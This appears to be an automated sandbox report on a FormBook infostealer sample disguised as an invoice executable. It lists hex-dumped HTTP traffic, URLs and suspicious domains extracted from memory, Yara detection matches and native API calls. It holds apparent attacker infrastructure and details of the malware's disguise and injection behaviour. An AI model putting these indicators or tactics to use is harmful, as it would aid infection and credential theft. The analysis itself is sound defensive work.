74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 73 65 67 75 69 6d 69 65 6e 74 6f 22 3e 3c 2f 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 45 73 74 61 20 65 73 20 6c 61 20 70 26 61 61 63 75 74 65 3b 67 69 6e 61 20 64 65 3a 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 6
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Apr 2024 06:40:31 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Apr 2024 06:40:34 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Apr 2024 06:40:37 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Apr 2024 06:40:41 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: HYCO_Invoices MS2 & MS3.exe String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: HYCO_Invoices MS2 & MS3.exe String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: HYCO_Invoices MS2 & MS3.exe String found in binary or memory: http://ocsp.comodoca.com0
Source: JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2892203666.0000000004B0E000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.skibinscy-finanse.pl
Source: JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2892203666.0000000004B0E000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.skibinscy-finanse.pl/aleu/
Source: replace.exe, 00000005.00000003.2093471603.0000000007EC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://arsys.es/css/parking2.css
Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://assets.iv.lt/default.css
Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://assets.iv.lt/footer.html
Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://assets.iv.lt/header.html
Source: firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://assets.iv.lt/images/icon.png
Source: firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://assets.iv.lt/images/thumbnail.png
Source: replace.exe, 00000005.00000003.2093471603.0000000007EC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: replace.exe, 00000005.00000002.2891299160.000000000469C000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.000000000308C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cgqbbu1mvnevcxzh.app
Source: replace.exe, 00000005.00000003.2093471603.0000000007EC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: replace.exe, 00000005.00000003.2093471603.0000000007EC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: replace.exe, 00000005.00000003.2093471603.0000000007EC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: replace.exe, 00000005.00000003.2093471603.0000000007EC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: replace.exe, 00000005.00000003.2093471603.0000000007EC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://klientams.iv.lt/
Source: replace.exe, 00000005.00000002.2889773857.00000000030BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: replace.exe, 00000005.00000002.2889773857.00000000030BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: replace.exe, 00000005.00000002.2889773857.00000000030BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: replace.exe, 00000005.00000002.2889773857.0000000003092000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: replace.exe, 00000005.00000002.2889773857.00000000030BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: replace.exe, 00000005.00000002.2889773857.0000000003092000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: replace.exe, 00000005.00000003.2088352031.0000000007EAD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.arsys.es/backup?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=backup
Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.arsys.es/correo?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=correo
Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.arsys.es/crear/tienda?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=tiendas
Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.arsys.es/dominios/buscar?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dominio
Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.arsys.es/dominios/gestion?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=resell
Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.arsys.es/dominios/ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=ssl
Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.arsys.es/dominios?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dominios
Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.arsys.es/herramientas/seo?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=seo
Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.arsys.es/herramientas/sms?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=sms
Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.arsys.es/hosting/revendedores?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=re
Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.arsys.es/hosting/wordpress?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=wordp
Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.arsys.es/hosting?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=hosting
Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.arsys.es/partners?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=partners
Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.arsys.es/servidores/cloud?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=cloud
Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.arsys.es/servidores/dedicados?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=de
Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.arsys.es/servidores/vps?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=vps
Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.arsys.es/soluciones?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=solutions
Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.arsys.es?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=arsys
Source: HYCO_Invoices MS2 & MS3.exe String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: replace.exe, 00000005.00000003.2093471603.0000000007EC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: replace.exe, 00000005.00000003.2093471603.0000000007EC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.iv.lt/
Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.iv.lt/domenai/
Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.iv.lt/duomenu-centras/
Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.iv.lt/el-pasto-filtras/
Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.iv.lt/neribotas-svetainiu-talpinimas/
Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.iv.lt/profesionalus-hostingas/
Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.iv.lt/sertifikatai/
Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.iv.lt/svetainiu-kurimo-irankis/
Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.iv.lt/talpinimo-planai/
Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.iv.lt/vps-serveriai/

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.1897785067.0000000000EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2890705749.0000000003420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1897325646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2892203666.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2890660634.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2890477730.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1898787100.0000000001E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1897785067.0000000000EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.2890705749.0000000003420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1897325646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.2892203666.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.2890660634.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.2890477730.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1898787100.0000000001E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
.NET source code contains very large array initializations
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.335a064.3.raw.unpack, .cs Large array initialization: : array initializer size 13798
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.3319bb4.8.raw.unpack, .cs Large array initialization: : array initializer size 13798
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.5b10000.12.raw.unpack, .cs Large array initialization: : array initializer size 13798
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: HYCO_Invoices MS2 & MS3.exe
Contains functionality to call native functions
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0042B233 NtClose, 2_2_0042B233
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01032B60 NtClose,LdrInitializeThunk, 2_2_01032B60
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01032DF0 NtQuerySystemInformation,LdrInitializeThunk, 2_2_01032DF0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01032C70 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_01032C70
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010335C0 NtCreateMutant,LdrInitializeThunk, 2_2_010335C0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01034340 NtSetContextThread, 2_2_01034340
